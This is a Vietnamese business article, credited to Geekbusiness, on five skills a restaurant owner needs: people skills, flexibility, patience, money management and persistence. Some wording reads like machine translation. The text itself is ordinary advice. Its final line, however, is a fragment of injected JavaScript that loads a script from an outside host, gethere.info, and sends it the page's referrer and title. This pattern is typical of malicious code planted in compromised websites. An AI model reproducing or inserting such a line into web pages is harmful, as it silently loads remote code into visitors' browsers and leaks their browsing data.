Đối với nhiều người, việc có thể mở một nhà hàng thành công và cung cấp các món ăn đáp ứng mọi mong muốn thực khách là một giấc mơ xa vời và gần như là chung với đa số những người có ý định này.
Tuy nhiên, việc bắt đầu sở hữu một nhà hàng không phải là trò đùa. Bạn nên được cho biết một thông số đã được thống kê lại rằng có khoảng hai trong số ba nhà hàng mới thất bại trong ba năm đầu tiên, nghĩa là tỉ lệ thất bại khoảng trên 60%, bất kể cá nhân đó có khẳng định một nền tảng kinh doanh vững chắc hay không. Nếu bạn đang ấp ủ những mong muốn được mở một nhà hàng của riêng mình thì trước hết bạn cần chắc chắn rằng mình đang có đầy đủ các kỹ năng cần thiết để hoàn thành mục tiêu đó. Sau đây là những kỹ năng thiết yếu, cần thiết cho cả chủ sở hữu mới cũng như chủ nhà hàng cũ để bắt đầu xây dựng hay phát triển nhà hàng của mình.
#1 Kỹ năng con người tuyệt vời
Trở thành một chủ nhà hàng đòi hỏi kỹ năng con người phải đặt lên hàng đầu, nói một cách dễ hiểu, bạn là người liên tục phải đối mặt với khách hàng, nhân viên, đối tác qua ngày này, tháng nọ. Đồng thời chủ sở hữu thường xuyên phải đối phó, giải quyết những vấn đề, thắc mắc của khách hàng, nhà cung cấp thực phẩm hoặc thậm chí nhân viên cấp dưới về công việc hay chế độ lương,…Ngoài ra, họ cũng cần có cá tính riêng, những chính kiến cá nhân và khả năng thuyết phục người khác. Nếu không có những suy nghĩ đúng cần thiết để đối phó với những người này mỗi ngày, chủ sở hữu có thể nhận thấy nhà hàng của họ không thể tồn tại được lâu.
#2 Mềm dẻo
Với bất cứ sự khởi động nào, chủ sở hữu nhà hàng sẽ cần phải có sự nhạy bén để đáp ứng đúng và đủ nhu cầu của khách hàng khi nhà hàng của họ vẫn còn non trẻ. Một cách để chuẩn bị cho sự khắc nghiệt là làm quen với tất cả các công việc liên quan đến việc điều hành một nhà hàng. Hiểu được vai trò của người phục vụ, bartender, máy chủ, máy rửa chén và những điều tương tự như vậy; việc làm này không chỉ cho phép bạn nhanh chóng lấp đầy nhu cầu khi nó phát sinh, nó cũng sẽ cung cấp cho bạn một sự hiểu biết tốt hơn về từng vị trí trong nhà hàng của bạn. Với phạm vi mở rộng kiến thức, bạn sẽ có thể hiểu được nhu cầu của nhân viên, cũng như làm thế nào để giữ cho nhà hàng của bạn hoạt động một cách hiệu quả nhất có thể.
#3 Kiên nhẫn
Gordon Ramsay là một gương mặt quen thuộc trong các ngành công nghiệp thực phẩm, nổi tiếng với cá tính mạnh và cực kỳ nóng tính. Nhưng trong một nhà hàng bình thường, một cá nhân như vậy sẽ làm thời gian hoạt động của nhà hàng đó bị rút ngắn nhiều lần. Hoạt động kinh doanh nhà hàng thực sự phải trải qua nhiều thăng trầm, biến động và một chủ sở hữu nhà hàng đòi hỏi phải có sự kiên nhẫn phi thường để vượt qua những khách hàng nóng tính, những nhân viên biếng nhác hay những nhà phê bình khó ưa. Nếu bạn là người có cá tính mạnh và dễ dàng nổi cáu với những người khác hoặc không thể giữ ý kiến của bạn, tôi nghĩ ngành công nghiệp thực phẩm này thực sự không phải nơi dành cho bạn.
#4 Kỹ năng quản lý tiền bạc
Bắt đầu một nhà hàng cũng đồng nghĩa với việc bạn bắt đầu phải làm quen với vấn đề tiền bạc và việc quản lý chúng sao cho hiệu quả. Có rất nhiều chi phí mà chủ sở hữu phải xem xét một cách cẩn thận. Thông thường, các chi phí ban đầu cần thiết để bắt đầu một nhà hàng sẽ là khá phức tạp, đòi hỏi một khoản vay lớn từ ngân hàng. Ngoài ra, chủ sở hữu sẽ cần phải mua thiết bị, đồ dùng,…cũng như tìm một ví trị phù hợp cho nhà hàng của bạn. Một trong những lý do chính tại sao một nhà hàng không thể tồn tại được lâu là bởi vì họ đang thiếu vốn. Vì vậy, các chủ nhà hàng mới sẽ cần có những kỹ năng quản lý tiền tuyệt vời để duy trì dòng tiền một cách bền vững.
#5 Sự bền bỉ
Như đã đề cập đến bên trên, không phải mọi chủ nhà hàng khi mới bắt đầu kinh doanh đều có thể thành công. Một số tồn tại được nhưng sẽ bị rơi vào quên lãng còn một số thì buộc phải đóng cửa. Nếu bạn quyết tâm để xem hàng của bạn có thành công hay không, tôi khuyên bạn nên kiên trì theo đuổi nó. Công việc này đòi hỏi chủ sở hữu phải dành phần lớn thời gian và mọi tâm huyết vào công việc mình đang làm. Nhiều người thực sự không có đủ sự nhiệt tâm cho công việc này và họ đã thất bại. Có thể sẽ mất hàng tháng dài, thậm chí hàng năm trời, chịu nhiều áp lực, mệt mỏi nhưng tin tôi đi, sự thành công sẽ là điều bạn xứng đáng có được và là phần thưởng lớn nhất lúc đó.
Trên đây là những kỹ năng quan trọng cần thiết cho bất kỳ chủ sở hữu nhà hàng nào, dù mới hay cũ; hoặc bạn có thể hiểu là danh sách những phẩm chất của một chủ nhà hàng thành công.
(Nguồn: Geekbusiness)
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;